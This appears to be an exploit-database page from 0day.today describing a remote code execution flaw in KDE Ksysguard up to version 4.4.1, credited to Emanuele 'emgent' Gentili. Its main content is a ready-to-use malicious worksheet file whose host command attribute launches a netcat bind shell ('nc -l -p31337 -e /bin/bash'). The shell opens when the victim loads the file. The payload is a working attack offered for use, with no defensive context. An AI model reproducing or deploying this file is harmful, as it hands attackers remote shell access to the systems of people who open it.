[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting Vulnerability

Author
emgent
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11380
Category
remote exploits
Date add
20-03-2010
Platform
multiple
========================================================================
KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting Vulnerability
========================================================================

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting
#            http://it.wikipedia.org/wiki/Cross_Application_Scripting
 
 
 
halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$ 



#  0day.today [2024-11-15]  #